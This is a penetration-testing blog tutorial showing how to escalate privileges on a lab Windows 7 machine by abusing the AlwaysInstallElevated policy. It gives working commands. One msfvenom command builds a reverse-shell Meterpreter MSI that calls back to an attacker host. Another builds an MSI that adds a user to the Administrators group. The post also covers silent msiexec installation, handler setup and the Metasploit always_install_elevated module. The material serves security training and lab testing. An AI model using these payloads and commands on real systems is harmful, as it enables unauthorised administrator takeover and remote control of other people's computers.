Hello Friends!! In this article we are demonstrating the Windows privilege escalation method via the method of AlwaysInstallElevated policy. In penetration testing, when we spawn command shell as local user, it is possible to exploit the vulnerable features (or configuration settings) of Windows Group policy, to further elevate them to admin privileges and gain the administrator access
Table of Content
- Introduction
- Lab setup
- Spawn command shell as local user
- Escalate privilege manually via .msi payload (MSfvenom)
- Escalated privilege via Adding user Administrators Group (Msfvenom)
- Escalate privilege via Post exploit (Metasploit)
Introduction
AlwaysInstallElevated Policy
As we all are aware that Windows OS comes installed with a Windows Installer engine which is used by MSI packages for the installation of applications. These MSI packages can be installed with elevated privileges for non-admin users
For this purpose the AlwaysInstallElevated policy feature is used to install a MSI package file with elevated (system) privileges. This policy if enabled in the Local Group Policy editor; directs the Windows Installer engine to use elevated permissions when it installs any program on the system. This method can make a machine vulnerable posing a high security risk, because a non-administrator user can run installations with elevated privileges and access many secure locations on the computer.
Caution Note: This option is equivalent to granting full administrative rights, which can pose a massive security risk. Microsoft strongly discourages the use of this setting. Hence this should be used for the lab purposes only (and not in Production environment)
Lab set-up
Victim’s Machine: Windows 7
Attacker’s machine: Kali Linux
To make this policy effective [i.e install a package with elevated (system) privileges], we need to ensure that victim machine is deliberately made vulnerable by enabling the AlwaysInstalledElevated Policy in the Computer Configuration and User Configuration folders of the Local Group Policy editor
For the Windows configuration
Type gpedit.msc in the Run dialog box of the Start Menu in the Windows 7 machine and the Local group Policy editor window prompt will open
- Change the settings of AlwaysInstalledElevated policy
- For the Computer configuration
Navigate to the below path in the Windows machine
Computer Configuration\Administrative Templates\Windows Components\Windows Installer
Enable the Always install with elevated privileges
For the User configuration
Navigate to the below path in the Windows machine
User Configuration\Administrative Templates\Windows Components\Windows Installer
Enable the Always install with elevated privileges
This completes the lab setup on the Windows machine .Now let’s proceed to our actual task.
Spawning Victim’s Machine
We need to compromise the Windows victim machine at least once to gain the meterpreter session. As you can observe that we already have victim’s metrepreter session. Let’s open the msfconsole and check the existing current sessions
msfconsole sessions
As we can see that there exists a session already with the ID 1 . Now let’s open the session 1 and extract the user details
meterpreter > sessions 1 meterpreter >getuid
As we can see that we are logged into this session with the username as raj.
Note : The existing user “raj” already exists in the Windows 7 victim machine and is a non-admin user
Now let’s open the command shell of the target machine
meterpreter >shell
Upon executing the shell command, we would land into the user’s Downloads folder C:\Users\raj\Downloads
We will now run the registry query command on this command prompt so as to verify whether the Windows installer have elevated privileges or not, as per our settings configured earlier
reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer
As we can see from the output that the registry named “AlwaysInstallElevated” exists with a dword (REG_WORD) value of 0x1, which means that the AlwaysInstallElevated policy is enabled.
Privilege Escalation via .msi payload (1st Method)
Now let’s open a new terminal in Kali machine and generate a MSI Package file (1.msi ) utilizing the Windows Meterpreter payload as follows
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.120 lport=4567 –f msi > /root/Desktop/1.msi
On the existing Meterpreter session of the user, let’s upload our MSI file named 1.msi to the target machine as follows. Once it is uploaded successfully, we will then jump to the shell
upload /root/Desktop/1.msi .
Note: Before executing the MSI Package file, let’s start a MSF handler in another terminal window
(Refer to the commands for same, after the below screenshot)
Execute the MSI package file on the Windows command prompt
msiexec /quiet /qn /i 1.msi
/quiet = Suppress any messages to the user during installation
/qn = No GUI
/i = Regular (vs. administrative) installation
In a parallel window, we opened a new handler before executing the .msi file
msf > use exploit/multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp msf exploit(handler) > set lhost 192.168.1.120 msf exploit(handler) > set lport 4567 msf exploit(handler) > exploit
Finally we got the meterpreter session using this exploit!! Let’s have further look at the details of the user privileges we gained on this system
meterpreter > getsystem meterpreter > getuid
Fantastic!! We have rooted to the Local System account (NT AUTHORITY\SYSTEM) which has the highest level of privileges on the local system.
Adding user in Administrators Group (2nd Method)
In this method we will choose a non-admin user from the existing list of users in the target machine and then try to elevate his privileges. Here we will send the relevant Windows commands (to the target machine) , utilizing the windows/exec payload of the Metasploit.
First let us check the details of existing users in the victim machine. Here we can select any user , lets; select a user named “raaz” who is a non-admin user
net user
The verification that the user name “raaz” is in the Local Users group can be done by running the following in the command prompt
net user raaz
Generate a MSI package (2.msi ) with the windows/exec payload, that sends a command instructing to add local admin privileges for the user “raaz” , to the target machine.
msfvenom -p windows/exec CMD='net localgroup administrators raaz /add' -f msi > /root/Desktop/2.msi
Now let’s upload the MSI file 2.msi to the target machine as follows
Note : Before uploading the MSI file , press Ctrl+Z to exit out of the victim machine’s command shell
In the meterpreter shell type
upload /root/Desktop/2.msi .
Once the MSI file is uploaded successfully, we will take the command shell and execute the installer file
shell msiexec /quiet /qn /i 2.msi
The verification that the user name “raaz” has been added into the local administrator group can be done by running the following in the command prompt
net user raaz
As we can see from the screenshot the user raaz is now member of Local Administrators group
Awesome !! We have got the privileges of the non-admin user escalated via using the manual exploit .
Privilege Escalation via Metasploit Post Exploit (3rd Method)
In order to perform the Privilege escalation abusing the AlwaysInstalledElevated policy , we can also utilize the inbuilt exploit of the Metasploit module as follows :
Now let’s use this exploit
use exploit/windows/local/always_install_elevated msf exploit(always_install_elevated) > set session 1 msf exploit(always_install_elevated) > exploit
We got the meterpreter session using the in-built exploit as well !! Now lets have further look at the details of the user privileges
meterpreter > getsystem meterpreter > getuid
Hurrah!! We have rooted to the Local System account (NT AUTHORITY\SYSTEM) which has the highest level of privileges on the local system
Note : We have shown one of the methodologies to elevate the privileges .This lab can be performed in multiple ways , as there are many other methods of performing the Windows privilege escalation.
Author: Ankur Sachdev is Information Security consultant and researcher in the field of Network & WebApp Penetration Testing . Contact Here
The post Windows Privilege Escalation (AlwaysInstallElevated) appeared first on Hacking Articles.